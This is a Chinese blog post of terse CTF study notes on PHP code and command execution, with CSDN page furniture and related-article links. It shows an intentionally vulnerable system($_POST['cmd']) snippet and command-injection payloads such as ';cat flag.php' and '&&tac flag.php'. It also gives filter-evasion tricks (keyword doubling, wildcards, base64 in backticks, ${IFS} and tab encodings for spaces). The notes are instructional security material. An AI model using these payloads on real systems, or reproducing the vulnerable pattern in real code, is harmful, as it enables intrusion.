php代码执行--可能漏洞点

已于 2024-05-24 08:25:34 修改
阅读量777 收藏 12
点赞数 14
分类专栏: # CTF # php开发基础 # owasp top10 文章标签: php 开发语言 网络 安全 网络安全 网络攻击模型 计算机网络
于 2024-05-23 20:38:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/139157113
版权

目录

php代码执行

找不到包?

get包改post包

自定义函数

危险函数

php的命令执行(Linux命令执行)

php执行系统命令6种函数:

php命令执行利用

参数值可控:

整体可控:

变量拼接绕过关键字

符号过滤

过滤空格

字符串截取 空格

随记...杂

php代码执行

hackbar插件

信息泄露

php手册

phpstudy

<?php
$a=$_get['a'];
echo $a;
​
​
?>
//  <>外正常显示:
echo '123456';
​
​

hackbar

post请求,

找不到包?

用那个插件,删去localhost, 访问时访问自己的内网地址.

get包改post包

右键change.

windows本机的服务 telnet.

不能同时发get和post的包. 包!!!

自定义函数

add函数,做拼接.

<?php
function add($a,$b){
    retunrn $a+$b;
}
$a=$_POST['a'];
$b=$_POST['b'];
$c=add($a,$b);
echo $c;
​
​
?>

危险函数

system函数

<?php
$cmd=$_POST['cmd'];
system($cmd);
?>
    
    //cmd=calc
    
    

php的命令执行(Linux命令执行)

远程命令执行 RCE

命令执行/代码执行

php执行系统命令6种函数:

system

passthru

exec

shell_exec

popen

pcntl_exec

执行运算符 `

windows---

calc bat vbs

Linux----

cat cp nc

--命令--黑窗口!!!

php命令执行利用

dir=;cat flag.php

ping -c 1 www.baidu.com
​

命令可控

​ 参数

​ 参数值

​ 整体

​ --首先判断可控的位置,然后针对绕过.

参数值可控:

要url编码
&&  并列执行.
||  一个成功就结束.(短路)
;   先执行完前一条命令.
&&tac flag.php

tac flag.php|| whoami

整体可控:

整体可控:
​
1-黑名单过滤
ccatat  双写
*   (通配符)
mv *.txt ./tmp
?   (占位符)
a?c.txt 
x?d.txt
​
cmd=tac f*.php||ls
​
tac 是倒着一行一行读.

cat 1.txt
cat `echo '1.txt'`
​
echo '1.txt'|base64
cat `echo '编码值'|base -d`
​
​
​

url编码注意什么时候用

变量拼接绕过关键字

符号过滤

过滤空格
tac<>flag
​
${IFS}
$IFS$9
​
bash--> {cmd,args}
​
%09 %0b %0c
​
​
tac1fla?.php
1-128   bp快速爆破空格
%   两位数字    (url编码)
​
字符串截取 空格
cmd=env     读取环境变量
​
tac fla*
tac${:12:1}fla*
​
​
--拿取环境变量的空格去补
​
​
​

金灰
关注
  • 14
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP-CGI远程代码执行漏洞(CVE-2012-1823)
千寻的博客
03-06 1177
就是用户请求的`querystring`(`querystring`字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了`php-cgi`的参数,最终导致了一系列结果。
(CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1316
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
iwebsec--代码执行漏洞
追求卓越,技术流~
12-04 1118
代码审计 如果post请求中有1,就会执行1中的参数 assert()函数和evel()函数类似,能把里面的字符串转化为php代码执行 call_user_func()函数第一个参数是函数,第二个参数是调用的参数 fun=“系统执行的函数”,而arg=“系统执行的命令” 可以说,如果黑客知道有这个函数那么后果是非常严重的,可以写入任意的语句 和call_user_func一样没太大区别 create_function()函数,func构造的函数,而func构造的函数,而func构造的函数,而code
PHP-FPM 远程代码执行漏洞
锋刃科技的博客
05-21 2115
漏洞简介 国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现, 向目标服务器 URL 发送 %0a 符号时, 服务返回异常, 疑似存在漏洞 2019年10月23日, github公开漏洞相关的详情以及exp.当nginx配置不当时, 会导致php-fpm远程任意代码执行 影响组件 Nginx + FPM + PHP7 漏洞指纹 Nginx PHP Nextcloud 漏洞分析 该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location
CVE-2019-11043(PHP远程代码执行漏洞
m0_51468027的博客
02-12 8822
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
【CVE-2024-4577】PHP CGI 远程代码执行漏洞
qq_21039641的博客
06-08 1246
PHP 语言在设计时忽略Windows 作业系统内部对字元编码转换的Best-Fit特性,导致未认证的攻击者可透过特定的字元序列绕过旧有。的保护,透过参数注入等攻击在远端PHP 服务器上执行任意代码
PHPUnit远程代码执行漏洞 CVE-2017-9841 漏洞复现
ADummy的博客
02-27 2463
PHPUnit远程执行代码(CVE-2017-9841) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>命令执行 0x01漏洞介绍 PHPUnit是面向程序员的PHP测试框架。 Util/PHP/eval-stdin.php在4.8.28之前的PHPUnit和5.6.3之前的5.x中允许远程攻击者通过以<?php子字符串开头的HTTP POST数据执行任意PHP代码,如对具有暴露的/ vendor文件夹的站的攻击(即外部访问)所证明的到/vendor/phpuni
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 2173
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全
Web漏洞-命令执行代码执行漏洞
Ays.Ie的博客
03-13 1789
该篇描述了web漏洞-命令执行代码执行漏洞
PHP代码执行漏洞总结大全
热门推荐
LJW_IIE的博客
10-11 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
PHP-CGI远程代码执行漏洞分析与防范
12-20
CVE-2012-1823出来时据说是“PHP远程代码执行漏洞”,曾经也“轰动一时”,当时的我只是刚踏入安全门的一个小菜,直到前段时间tomato师傅让我看一个案例,我才想起来这个漏洞。通过在 Vulhub 中对这个漏洞环境的搭建...
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
【基础篇】第09篇:PHP代码审计笔记--代码执行漏洞1
08-03
常见代码注射函数:如:eval、preg_replace+/e、assert、call_user_func、call_user_func_array、creat
【基础篇】第07篇:PHP代码审计笔记--命令执行漏洞1
08-03
| 管道符,显示后面的执行结果 ping 127.0.0.1|whoami11 当前面的执行出错时执行后面的 ping 1||whoami& 前面的语句为假则直
深入解析PHP函数
NatLindsay的博客
06-17 414
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
ImageNet-1k 测试集 两大坑
weixin_42815846的博客
06-16 301
不然就会浪费一次提交机会,直接提交submission.txt就可以,注意每排5个预测结果,用于计算top5 error。2、用torchvision自带的imagenet dataset类加载进来的数据的类别标签,)但torchvision自动给你弄成。1、官方网站提交test set标签时,,但是他们的类别id不一样!以chickadee 山雀为例。这是torchvision的。他们的WNID都一样,
[极客大挑战 2020]Roamphp4-Rceme
最新发布
不会编程的崽的博客
06-20 192
右键源代码里给了提示,有备份文件index.php.swp,大伙都做到这来了,应该不用写了吧。加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]passthru(next(getallheaders()));然后,需要要绕过两层,多年rce经验,相信你一眼能看出。我们由内往外构造,这里需要前置知识(贴其他大佬的吧)知道原因可以在评论区踢我一脚。
1. NAS和SAN存储
u010198709的博客
06-13 554
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络
教育培训系统(FastAdmin+ThinkPHP+Unipp)
2401_84413757的博客
06-17 449
教育培训系统是一个集在线课程、学习资源、互动交流等功能于一体的综合性学习平台。它打破了传统教育的时空限制,让学习变得更加灵活自由。学员们可以根据自己的时间和需求,随时随地访问系统,选择感兴趣的课程进行学习。教育培训系统以其便捷的学习方式、丰富的资源和智能的评估功能,为我们的学习之路增添了色彩。让我们一起拥抱这个全新的学习平台,让学习变得更简单、更有趣!
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值